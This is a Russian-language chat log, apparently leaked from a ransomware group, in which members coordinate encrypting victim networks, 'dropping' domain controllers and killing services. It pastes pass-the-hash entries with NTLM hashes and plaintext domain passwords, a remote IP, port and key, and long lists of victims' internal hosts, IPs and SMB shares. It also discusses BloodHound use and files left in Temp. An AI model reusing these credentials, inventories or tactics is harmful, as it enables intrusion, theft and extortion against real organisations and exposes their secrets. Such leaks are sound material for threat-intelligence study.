Не подтянулось 8 серверовзакончили?так ну чтотам тоже обработаноесть Епо крайней мере темп и сис32а диск другой? тиап Д или мб там ест ькакой другой?и папку Windows не тронулоага?я так понимаю оно и не лезет тудаи там и там``
06/19/2019 07:00 PM <DIR> Windows Defender
06/10/2020 01:13 AM <DIR> Windows Mail
06/10/2020 01:13 AM <DIR> Windows Media Player
07/16/2016 07:23 AM <DIR> Windows Multimedia Platform
07/16/2016 07:23 AM <DIR> Windows NT
06/10/2020 01:13 AM <DIR> Windows Photo Viewer
07/16/2016 07:23 AM <DIR> Windows Portable Devices
07/16/2016 07:23 AM <DIR> WindowsPowerShell

```но в програм файлах и програм файлах х86 не тронуло вот этовезде сегодняшня датачтобы посмотретьможешь проверить даты тача файлов и папок рукамиреспавн?появиление записки не является гарантией того что локер прошелся по всему винчу``
у меня 1 приказала долго жить, но ридми на ней появился
```
если при этом отвалился процес куда инжект был - то локер встал соответственноа после процес не отпал?появился до тогоу меня 1 приказала долго жить, но ридми на ней появилсяи статистику по всем доменасесии не покрашились при инжекте?вобщем
кассею мы обошли
размеренно покуривая?видимо)) от радостиа че орешьесли везде есть - можно и дк хлопануть тогда уже = )ПРОВЕРИЛИРЕДМИ ЕСТЬдобиваем и ДК всекогда все остальное умретдк ебашим?их на конец как всегдану кроме ДК@tl1@tl2?,лочим все сразускули есть агаа, там естьскули ещекаких-то других сервисов которые могут важные даные заниматьтам нечем дополнить батник?на всякий случай напминаю что надо покилять сервисы не забыть на замапленных тачкахесли у вас вопросы есть он дописану вас же роадмап)конечноrjytxyjмапи?То что выше не притянуть @tl1``
pth us.alloypolymers.com\adonixadmin 88781646e2a2399370c54bae7f790e58
ALLOYAMMS: 10.1.1.231 -
ALLOYCRKT01: 10.1.5.250 -
OHSPICEWORKS: 10.1.10.11 -
ALLOYORGAPP01: 10.1.8.11 -



ALLOYLICWEB: 10.1.1.238 ---
ALLOYAPP3: 10.1.1.250 ---


rtpco.local\O365Service 7facdc498ed1680c4fd1448319a8c04f
 
AXFORMS-DEV: 10.89.11.111 -
ONBASETEST: 10.89.11.10 -

89.0.10.121 -
89.0.192.80 -
89.0.191.172 -
89.0.192.3 -
89.0.193.15 -
10.1.10.146 -
89.0.192.202 -
10.58.58.91 -
10.89.11.34 -
``````
89.0.10.121 -
89.0.192.80 -
89.0.191.172 -
89.0.192.3 -
89.0.193.15 -
10.1.10.146 -
89.0.192.202 -
10.58.58.91 -
10.89.11.34 -
``````
ALLOYEXCH02: 10.1.1.240 +
GAHDC2: 10.1.10.81 +
GAHDC01: 10.1.10.82 +
``спасибо[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=Y7LiqEPosNs6nCCna) rtpco.localребят скиньте адюзерс со всех доменов``
ALLOYLICWEB: 10.1.1.238 ---
ALLOYAPP3: 10.1.1.250 ---
``````
rtpco.local\O365Service 7facdc498ed1680c4fd1448319a8c04f
 
AXFORMS-DEV: 10.89.11.111 -
ONBASETEST: 10.89.11.10 -
``Попробуйте притянуть``
pth us.alloypolymers.com\adonixadmin 88781646e2a2399370c54bae7f790e58
ALLOYAMMS: 10.1.1.231 -
ALLOYEXCH02: 10.1.1.240 -
GAHDC2: 10.1.10.81 -
ALLOYCRKT01: 10.1.5.250 -
OHSPICEWORKS: 10.1.10.11 -
ALLOYORGAPP01: 10.1.8.11 -
GAHDC01: 10.1.10.82 -
``cancelet 8669993c0b6f8d65cd206a0c9e1d598bO365Service 7facdc498ed1680c4fd1448319a8c04fя переместилкобу с #wilsonart-com только не убейте``
74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
``````
++rtpco.local SERV++
AXAOS-TEST: 10.89.11.123
AXAOS-TRAINING: 10.89.11.122
WINONAV1: 10.89.11.22
AXBATCH-TEST: 10.89.11.112
AXAOS-BUILD: 10.89.11.120
SAN-HQ: 10.89.11.35
AXDEV3: 10.89.11.103
AXDEV6: 10.89.11.106
AXDEV1: 10.89.11.101
MINITABLIC: 10.89.11.6
AXDEV2: 10.89.11.102
TX-TESTSRV1: 10.58.0.166
AXSQL-DEV: 10.89.11.118
MXSTORAGE: 10.13.0.14
NEVADAHYPV1: 10.57.0.84
NVSTORAGE: 10.57.0.36
NVDC1: 10.57.0.32
MNDC2: 89.0.0.83
NEVADAHYPV1: 10.57.0.25
++us.alloypolymers.com++
RICHMONDDC1: 10.1.1.248
ALLOYLICWEB: 10.1.1.238
ALLOYAPP3: 10.1.1.250
``````
++rtpco.local SERV++
STORAGEWINONA: 10.89.11.13
CTXCONNECTOR1: 10.89.11.26
CTXCONNECTOR2: 10.89.11.27
RDSL: 10.89.11.21
SQLPROD1: 10.89.0.99
CTXAPP3: 10.89.11.28
KASEYA: 10.89.11.24
CTXAPP4: 10.89.11.11
ONBASETEST: 10.89.11.10
ONBASEPROD1: 10.89.11.7
ONBASETEST01: 10.89.11.33
WEBPROD01: 10.89.11.31
PDM01: 10.89.11.32
MAINTENANCE: 10.89.11.40
SOLARWINDS: 10.89.11.2
WINPAK01: 10.89.0.111
MNDC2: 89.0.0.81
STORAGEWINONA2: 10.89.11.14
EXCHANGE: 10.89.11.10
AXFORMS-DEV: 10.89.11.111
INDYDC1: 10.59.0.4
ADMT: 10.89.11.5
AXREPORTS-DEV: 10.89.11.121
``````
++rtpco.local SERV++
FRANCEDC1: 10.4.0.25
FRANCEDC2: 10.4.0.26
FRANCESTORAGE: 10.4.0.27
FRANCEPRINTSRV: 10.4.0.28
GERMANYDC1: 10.20.0.40
GERMANYDC2: 10.20.0.41
EN-VIR2008-02: 10.4.0.19
GERMANYSTORAGE: 10.20.0.42
FRANCESAGE: 10.4.0.100
FRANCEINTERMEC: 10.4.0.72
FRANCEARCHIVE: 10.4.0.10
POLSTORAGE: 10.28.0.8
DC1POLAND: 10.28.0.5
DC2POLAND: 10.28.0.6
DELLOME: 10.89.11.16
INDC2: 10.59.0.31
CAE1: 10.89.11.12
RTPSYSLOG: 89.0.192.125
INDYSTORAGE: 10.59.0.35
INVEEAM: 10.59.0.21
RTPAZAD: 10.89.0.190
RDSAPP4: 89.0.192.163
SYMMGR: 10.89.11.20
``````
++rtpco.local++
SG20170712-NB: 10.5.1.89
24L5: 10.33.2.239
RTP-KEN: 10.7.2.208
30L43: 89.0.192.45
ADAM-DESKTOP: 89.0.192.87
BBDESK2: 89.0.192.80
23LL37: 89.0.193.36
23LL7: 10.12.1.7
29LL32: 10.25.0.136
31LL45: 10.36.5.247
CANCELETPC: 10.89.11.3 ПРИТЯНУТЬ ВСЕ ДИСКИ
METROMTRREADER: 89.0.191.183
29LL9: 10.1.8.104
30L29: 10.1.8.157
DENNIS10: 10.33.255.253
LUNCHROOM2: 89.0.6.100
DEPCON10B: 89.0.192.150
30L59: 172.22.200.30
WIN7-INTERMEC: 10.4.72.72
26L22: 10.33.4.245
24L19: 172.22.200.18
25L32: 89.0.192.169
24L3: 10.33.1.250
25L21: 172.22.200.26
26L08: 10.58.0.197
29L06: 89.0.191.87
INDYTEST1: 10.59.0.105
25L12: 89.0.193.67
DEPCON10A: 89.0.192.146
32LL62: 89.0.192.244
30L69: 89.0.192.35
VIDEOINSIGHTDR: 10.89.11.33
DUCKLING: 10.89.11.22
30L85: 89.0.192.92
26L07: 10.12.1.3
24L11: 10.58.0.135
26L13: 10.58.6.11
ORION24: 89.0.191.71
25L58: 10.58.0.231
28L24: 10.57.0.85
EQL-SAN1: 10.89.5.100
QATHERMAL: 89.0.191.80
30L60: 89.0.192.78
````SDIJ*FHg78SDFGTI&SDtARTE%YET`не забудьте WOL``
++rtpco.local++
28LL75: 172.22.200.29
30L22: 10.1.5.151
W10-F2018-VIB: 10.4.1.46
W10-F2014-PYBA: 10.4.1.103
EQL-SAN2: 10.89.5.120
26L05: 172.22.200.24
30LL29: 89.0.192.177
30L17: 10.25.0.142
32LL29: 89.0.191.227
W10-P2017-LOG1: 10.28.0.179
26L29: 10.59.0.107
30L54: 89.0.191.174
28L10: 89.0.191.39
30L24A: 10.1.5.208
WINPAK-CLIENT: 10.89.11.1
30L03: 10.36.6.234
30L18: 172.22.200.76
26L59: 89.0.193.94
28LL56: 89.0.192.215
30L102: 10.59.0.120
30L96: 89.0.191.196
25L9: 89.0.191.43
SUZHOU-PROD: 10.7.2.61
33LL67: 89.0.192.215
28L40: 10.56.0.124
30L51: 10.56.0.126
DENNIS15: 89.0.88.20
DCHDESKTOP: 89.0.88.18
26L30: 89.0.191.217
30L41: 89.0.191.245
27L06: 89.0.192.160
25L5: 172.22.200.62
27L05: 172.22.200.59
25L52: 10.33.2.249
30L94: 10.59.0.156
28L16: 89.0.192.60
WIN7-2016-CHG: 10.28.0.100
AXUPS: 10.89.11.35
KEMPENBOXX: 89.0.193.108
26L47: 10.25.0.130
BSDESKTOP: 89.0.10.101
5CG5093XY1: 10.1.8.146
MXL5040QYD-1: 10.1.8.220
``````
++rtpco.local++
PRTMONITOR: 10.89.11.36
30L19: 89.0.192.127
27L04: 89.0.10.121
DEPCON10EM: 89.0.192.116
30L42: 89.0.192.83
27L12: 10.56.0.166
27L07: 89.0.191.57
DENNISH10: 10.33.255.252
25L43: 172.22.200.66
30L47: 10.59.0.113
30L100: 89.0.192.80
30L98: 10.59.0.148
30L30: 10.1.8.145
25L38: 89.0.192.172
30LL56: 89.0.191.172
30L36: 10.1.8.143
25L29: 89.0.192.3
PHONEROOMFR: 10.4.1.96
25L42: 89.0.193.15
30L65: 10.1.10.146
30L15: 172.22.200.16
VC1: 172.22.254.20
27L28: 172.22.200.11
WININTERMEC32: 89.0.192.202
32LL58: 10.58.58.91
26L15: 10.13.0.92
25L37: 89.0.192.47
USH832L0DT: 10.1.8.128
30L14: 10.36.5.236
UPS580: 89.0.191.216
SBRENNO: 89.0.193.38
22L10INDY: 10.89.11.34
25L23: 89.0.192.114
AVANITEN: 10.89.11.34
28L19: 89.0.191.215
W10-EN2018-CYC: 10.4.1.13
DEPCON10EN: 89.0.192.141
30L10: 89.0.193.76
26L251: 10.32.1.188
30L107: 89.0.191.64
25L59: 89.0.191.46
31LL19: 89.0.192.102
25L60: 89.0.193.101
``так ну что начинаем?поработайте еще тут тогдаhttps://www.alibisecurity.com/alibi-central-management-software`http://10.0.0.202/doc/page/login.asp` - ALIBI
`http://10.0.0.21/````
 SCCY-DC 10.0.0.5
 TS 10.0.0.252
 SCCY-LT08 10.0.0.22
 SCCY-LT09 10.0.0.99
 SCCY-LT10 10.0.0.88
 TOOLROOM7106 10.1.4.150
 RYAN-GT73VR 10.1.4.164
 QVPRO-PC 10.0.0.93
 QATRACKING 10.0.0.113
 PRODUCTION-LT 192.168.113.2
 ASSEMBLYROOM 10.0.0.28
 MIKE-PC 10.1.4.210
 MFGWIN10-1 10.0.0.110
 SCCY-TOOLING 10.0.0.19
 JOE-BOXX-W10 10.0.0.103
 JOE-AIO2 10.0.0.89
 ENGINEERING-PC2 10.1.4.205
 ENGINEERING-PC1 10.1.4.178
 CONNIE-MICRO 10.0.0.82
 SCCY-FS 10.0.0.6
 SCCY-16 10.0.0.102
 SCCY-15 10.0.0.118
 SCCY-12 10.0.0.111
 SCCY-11 10.0.0.123
 SCCY-10 10.0.0.41
 SCCY-14 10.0.0.17
 SCCY-09 10.0.0.119
 SCCY-08 10.0.0.128
 SCCY-07 10.0.30.143
 SCCY-06 10.0.0.146
 SCCY-21 10.0.0.147
 SCCY-17 10.0.0.149
 SCCY-TN01 10.0.30.147
 SCCY-13 10.0.0.148
 SCCY-18 10.0.0.116
 SCCY-04 10.0.0.40
 SCCY-03 10.0.0.57
 SCCY-02 10.0.0.84
 SCCY-19 10.0.0.62
 SCCY-05 10.0.0.59
 SCCY-01 10.0.0.76
 DESKTOP-UMQJ809 10.1.4.230
 SCCY-20 10.1.4.221
 SCCY-NAS 10.1.4.175
 SCCY-RECEIVING 10.0.0.91
 SQL-VM 10.1.4.99
 SCCY-LT3 10.0.0.75
 SCCY-LT04 10.0.0.67
 SCCY-LT05 10.0.0.71
 SCCY-LT07 10.0.0.26
 SCCY-MASONACS 10.0.30.3
``````
SCCY\vdsadmin T@ng0D0wn!
SCCY\VannData Y33tC@nn0ns
``пожалуйстаспасибоuser7а удалить забыл тк мозг работает даже не на 20% из-за такого кайфового графика работы[ ](https://mediaeveryone.com/group/sccy-com?msg=Q5how5FjdR49GsnJs) если что нтдс этот не связан схэшами, это из мимика штука для ключей гугловских паролейточнее они были вышенет вопрос или что-то делалкто запускалзаебись, при расчете зп если у кого-то вылетит из головы будет норм видимовылетело из головыПонятия не имеювопросы вышечто?@user3 @user8[ ](https://mediaeveryone.com/group/sccy-com?msg=AL5cvDTfm6YBeQdpn) я нигдесетка то маленькая, там он работал то от силы секунд 10...где вы его еще запускали?шанс дропа после его запуска в разы вышебх без параметров ОЧЕНЬ сильно шумитя сколько раз писал в конце рабочего дня - удалять файлы, сессии в слипя хз, это не япочему удалено``
199.4KB file 01/25/2021 17:31:02 msupdate.dll
 1.2KB file 01/25/2021 17:39:36 ntds.pvk
```[ ](https://mediaeveryone.com/group/sccy-com?msg=xHQhm9FkNFqXrZRnm) Снимали бадхаунд? Если да то без параметров[ ](https://mediaeveryone.com/group/sccy-com?msg=BXrTsqRRDACMxqPoM) ?[ ](https://mediaeveryone.com/group/sccy-com?msg=4NT5tunCGfpFfNY84) как снимали? какие параметры запуска были?``
[+] Location: C:\Windows\Temp\*

 Size Type Last Modified Name
 ---- ---- ------------------- ----
            dir 01/25/2021 19:03:15 F18AC62B-E695-47FF-B459-2750FF73338D-Sigs
            dir 01/01/2021 13:35:09 WinSAT
 1.5MB file 01/25/2021 19:14:36 MpCmdRun.log
 773.6KB file 01/25/2021 19:03:34 MpSigStub.log
 199.4KB file 01/25/2021 17:31:02 msupdate.dll
 1.2KB file 01/25/2021 17:39:36 ntds.pvk
 256.0KB file 10/14/2020 17:41:18 TS_784C.tmp
 320.0KB file 10/14/2020 17:41:29 TS_A6D2.tmp
 1.0MB file 11/17/2020 08:43:16 UpdHealthTools.msi
``почему так грязно работаете?все по старому, креды только от 1 НАСа+добавьте всех в expFederal.com
закрывать же будемПо крайней мере у меня не получаетсяЭто какато лаба в ней ничего не сделать``
https://cloudgw.cpcc.edu/vpn/index.html
```
 а с этим у тебя что?)Конечноrjytxyj)ты с ними?не вижу конфуда я создамexpFederal.com = hobbes?
под нее конфу надо?``
\\USCHI-HD001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-HD001.Hobbes.loc\C$ - Default share
\\USCHI-HD001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-HD001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-APG003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-APG003.Hobbes.loc\C$ - Default share
\\USCHI-APG003.Hobbes.loc\E$ - Default share
\\USCHI-APG003.Hobbes.loc\F$ - Default share
\\USCHI-APG003.Hobbes.loc\IPC$ - Remote IPC
\\PCHIVHH001.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIVHH001.Hobbes.loc\C$ - Default share
\\PCHIVHH001.Hobbes.loc\E$ - Default share
\\PCHIVHH001.Hobbes.loc\IPC$ - Remote IPC
\\PCHIVHH001.Hobbes.loc\V$ - Default share
\\PCHIAPG015.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG015.Hobbes.loc\C$ - Default share
\\PCHIAPG015.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MAXP001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MAXP001.Hobbes.loc\C$ - Default share
\\USCHI-MAXP001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MAXP001.Hobbes.loc\M$ - Default share
\\USCHI-MAXP001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-LT002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-LT002.Hobbes.loc\C$ - Default share
\\USCHI-LT002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET005.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NET005.Hobbes.loc\C$ - Default share
\\USCHI-NET005.Hobbes.loc\E$ - Default share
\\USCHI-NET005.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET005.Hobbes.loc\print$ - Printer Drivers
\\PCHIFSP001.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIFSP001.Hobbes.loc\Apps -
\\PCHIFSP001.Hobbes.loc\ARCH -
\\PCHIFSP001.Hobbes.loc\C$ - Default share
\\PCHIFSP001.Hobbes.loc\Cad -
\\PCHIFSP001.Hobbes.loc\Citrix - Citrix Profiles
\\PCHIFSP001.Hobbes.loc\CIVIL -
\\PCHIFSP001.Hobbes.loc\COMM -
\\PCHIFSP001.Hobbes.loc\COMP -
\\PCHIFSP001.Hobbes.loc\CONST -
\\PCHIFSP001.Hobbes.loc\D$ - Default share
\\PCHIFSP001.Hobbes.loc\ELEC -
\\PCHIFSP001.Hobbes.loc\EXEC -
\\PCHIFSP001.Hobbes.loc\F$ - Default share
\\PCHIFSP001.Hobbes.loc\FS-0043 -
\\PCHIFSP001.Hobbes.loc\FS-0044 -
\\PCHIFSP001.Hobbes.loc\HR -
\\PCHIFSP001.Hobbes.loc\IPC$ - Remote IPC
\\PCHIFSP001.Hobbes.loc\IROA - IROA - ActiveInk Docs
\\PCHIFSP001.Hobbes.loc\MARKET -
\\PCHIFSP001.Hobbes.loc\MECH -
\\PCHIFSP001.Hobbes.loc\MKTG - Business Operations
\\PCHIFSP001.Hobbes.loc\NASUtils - PowerVault NAS Utilities
\\PCHIFSP001.Hobbes.loc\Network -
\\PCHIFSP001.Hobbes.loc\Pccommon -
\\PCHIFSP001.Hobbes.loc\proj_ae -
\\PCHIFSP001.Hobbes.loc\proj_cvl -
\\PCHIFSP001.Hobbes.loc\proj_str -
\\PCHIFSP001.Hobbes.loc\PTW6512 -
\\PCHIFSP001.Hobbes.loc\Restricted$ -
\\PCHIFSP001.Hobbes.loc\Safety -
\\PCHIFSP001.Hobbes.loc\SCANS -
\\PCHIFSP001.Hobbes.loc\SECTLDR -
\\PCHIFSP001.Hobbes.loc\Software$ - expFederal Software
\\PCHIFSP001.Hobbes.loc\Standard -
\\PCHIFSP001.Hobbes.loc\STRUCT -
\\PCHIFSP001.Hobbes.loc\Sys - Project Folders
\\PCHIFSP001.Hobbes.loc\TENGCNST -
\\PCHIFSP001.Hobbes.loc\User$ - Users Folders
\\USCHI-NET001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NET001.Hobbes.loc\C$ - Default share
\\USCHI-NET001.Hobbes.loc\E$ - Default share
\\USCHI-NET001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-NET001.Hobbes.loc\Software$ -
\\USCHI-NET001.Hobbes.loc\USCHI-PLT-0008 - Oce ColorWare Plotter 300
\\USCHI-MSE001.Hobbes.loc\address -
\\USCHI-MSE001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE001.Hobbes.loc\C$ - Default share
\\USCHI-MSE001.Hobbes.loc\E$ - Default share
\\USCHI-MSE001.Hobbes.loc\F$ - Default share
\\USCHI-MSE001.Hobbes.loc\G$ - Default share
\\USCHI-MSE001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MSE004.Hobbes.loc\address -
\\USCHI-MSE004.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE004.Hobbes.loc\C$ - Default share
\\USCHI-MSE004.Hobbes.loc\E$ - Default share
\\USCHI-MSE004.Hobbes.loc\F$ - Default share
\\USCHI-MSE004.Hobbes.loc\G$ - Default share
\\USCHI-MSE004.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-APG004.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-APG004.Hobbes.loc\Analytics_c8466842-1a17-4bad-abad-7d935647974b -
\\USCHI-APG004.Hobbes.loc\C$ - Default share
\\USCHI-APG004.Hobbes.loc\E$ - Default share
\\USCHI-APG004.Hobbes.loc\F$ - Default share
\\USCHI-APG004.Hobbes.loc\gthrsvc_c8466842-1a17-4bad-abad-7d935647974b-crawl-0 - Crawled Files Sharec8466842-1a17-4bad-abad-7d935647974b-crawl-0
\\USCHI-APG004.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-APG004.Hobbes.loc\print$ - Printer Drivers
\\USCHI-DCG002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCG002.Hobbes.loc\C$ - Default share
\\USCHI-DCG002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG002.Hobbes.loc\print$ - Printer Drivers
\\PCHIWSG005.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIWSG005.Hobbes.loc\AM -
\\PCHIWSG005.Hobbes.loc\AMM3EXT$ - BC-Meridian Extensions Share
\\PCHIWSG005.Hobbes.loc\C$ - Default share
\\PCHIWSG005.Hobbes.loc\F$ - Default share
\\PCHIWSG005.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG016.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG016.Hobbes.loc\C$ - Default share
\\PCHIAPG016.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG016.Hobbes.loc\SophosUpdate -
\\PCHIAPG016.Hobbes.loc\SUMInstallSet - Sophos Update Manager Installer
\\USCHI-PWD001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-PWD001.Hobbes.loc\C$ - Default share
\\USCHI-PWD001.Hobbes.loc\E$ - Default share
\\USCHI-PWD001.Hobbes.loc\F$ - Default share
\\USCHI-PWD001.Hobbes.loc\G$ - Default share
\\USCHI-PWD001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCP001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCP001.Hobbes.loc\C$ - Default share
\\USCHI-DCP001.Hobbes.loc\DAG01.hobbes.loc - File share witness created for microsoft exchange database availability group DAG01.
\\USCHI-DCP001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCP001.Hobbes.loc\NETLOGON - Logon server share
\\USCHI-DCP001.Hobbes.loc\SYSVOL - Logon server share
\\PCHIAPG014.Hobbes.loc\ActiveAdministrator - Active Administrator Server Share
\\PCHIAPG014.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG014.Hobbes.loc\BEW-4ecbc619f6de49a39b3bda9cec5b9074 - Push Directory
\\PCHIAPG014.Hobbes.loc\C$ - Default share
\\PCHIAPG014.Hobbes.loc\DADevicePolicyMaster$ - DADevicePolicyMaster$ share
\\PCHIAPG014.Hobbes.loc\E$ - Default share
\\PCHIAPG014.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG014.Hobbes.loc\Logs$ - Logs$ share
\\PCHIAPG014.Hobbes.loc\SLDAClient$ - SLDAClient$ share
\\PCHIAPG014.Hobbes.loc\Slogic$ - \\PCHIAPG014\SLOGIC$ share
\\PCHIAPG014.Hobbes.loc\SLscripts$ - SLscripts$ share
\\PCHIWSG007.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIWSG007.Hobbes.loc\C$ - Default share
\\PCHIWSG007.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCG003.Hobbes.loc\C$ - Default share
\\USCHI-DCG003.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG003.Hobbes.loc\NETLOGON - Logon server share
\\USCHI-DCG003.Hobbes.loc\SYSVOL - Logon server share
\\USCHI-BKP001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-BKP001.Hobbes.loc\C$ - Default share
\\USCHI-BKP001.Hobbes.loc\D$ - Default share
\\USCHI-BKP001.Hobbes.loc\E$ - Default share
\\USCHI-BKP001.Hobbes.loc\F$ - Default share
\\USCHI-BKP001.Hobbes.loc\G$ - Default share
\\USCHI-BKP001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-BKP001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-PRT001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-PRT001.Hobbes.loc\C$ - Default share
\\USCHI-PRT001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-PRT001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300 - Plotters NAME should not contain "_" per vendor recommendation
\\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300_PS - USCHI-PL_OCECW300_PS
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045 - South - Canon iR-ADV C5045/5051 PCL6
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045_PS - South - Canon iR-ADV C50455051 PS3
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255 - North - Canon iR-ADV C5250/5255 PCL6
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255_PS - North - Canon iR-ADV C52505 PS3
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530 - South - HP Color LaserJet CM3530
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530_PS - South - HP Color LaserJet CM3530 PS
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525 - HR Area - HP Color LaserJet CP3525 PCL6
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525_PS - HR Area - HP Color LaserJet CP3525 PS
\\USCHI-MAXD001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MAXD001.Hobbes.loc\C$ - Default share
\\USCHI-MAXD001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MAXD001.Hobbes.loc\M$ - Default share
\\USCHI-MSE003.Hobbes.loc\address -
\\USCHI-MSE003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE003.Hobbes.loc\C$ - Default share
\\USCHI-MSE003.Hobbes.loc\E$ - Default share
\\USCHI-MSE003.Hobbes.loc\F$ - Default share
\\USCHI-MSE003.Hobbes.loc\G$ - Default share
\\USCHI-MSE003.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SQL001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SQL001.Hobbes.loc\C$ - Default share
\\USCHI-SQL001.Hobbes.loc\E$ - Default share
\\USCHI-SQL001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SQL001.Hobbes.loc\print$ - Printer Drivers
\\DT-000037.Hobbes.loc\ADMIN$ - Remote Admin
\\DT-000037.Hobbes.loc\C$ - Default share
\\DT-000037.Hobbes.loc\IPC$ - Remote IPC
\\PCHIWSG006.Hobbes.loc\70182862-e52d-4fb0-bea2-3448c35de88f-query-0 - Used by Microsoft Search Server 2010 to copy index files between servers.
\\PCHIWSG006.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIWSG006.Hobbes.loc\C$ - Default share
\\PCHIWSG006.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MSE002.Hobbes.loc\address -
\\USCHI-MSE002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE002.Hobbes.loc\C$ - Default share
\\USCHI-MSE002.Hobbes.loc\E$ - Default share
\\USCHI-MSE002.Hobbes.loc\F$ - Default share
\\USCHI-MSE002.Hobbes.loc\G$ - Default share
\\USCHI-MSE002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCG001.Hobbes.loc\C$ - Default share
\\USCHI-DCG001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG001.Hobbes.loc\NETLOGON - Logon server share
\\USCHI-DCG001.Hobbes.loc\SYSVOL - Logon server share
\\PCHIDCG004.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIDCG004.Hobbes.loc\C$ - Default share
\\PCHIDCG004.Hobbes.loc\IPC$ - Remote IPC
\\PCHIDCG004.Hobbes.loc\NETLOGON - Logon server share
\\PCHIDCG004.Hobbes.loc\slETL$ -
\\PCHIDCG004.Hobbes.loc\SYSVOL - Logon server share
\\USCHI-LSS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-LSS001.Hobbes.loc\C$ - Default share
\\USCHI-LSS001.Hobbes.loc\Extreme_Loading_for_Structures - Extreme Loading┬" for Structures
\\USCHI-LSS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SPS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SPS001.Hobbes.loc\Analytics_8bda09f0-8cbc-4c38-8854-922eb0553239 -
\\USCHI-SPS001.Hobbes.loc\C$ - Default share
\\USCHI-SPS001.Hobbes.loc\E$ - Default share
\\USCHI-SPS001.Hobbes.loc\gthrsvc_8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0 - Crawled Files Share8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0
\\USCHI-SPS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NWA001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NWA001.Hobbes.loc\C$ - Default share
\\USCHI-NWA001.Hobbes.loc\E$ - Default share
\\USCHI-NWA001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NWA001.Hobbes.loc\KC$ -
\\USCHI-NWA001.Hobbes.loc\Netwrix_Auditor_Subscriptions$ - This is a default share for uploading Netwrix Auditor subscriptions.
\\USCHI-NWA001.Hobbes.loc\Netwrix_UAVR$ - This share contains audit data on user activity collected by Netwrix Auditor.
\\USCHI-NWA001.Hobbes.loc\print$ - Printer Drivers
\\LT-000108.Hobbes.loc\ADMIN$ - Remote Admin
\\LT-000108.Hobbes.loc\C$ - Default share
\\LT-000108.Hobbes.loc\IPC$ - Remote IPC
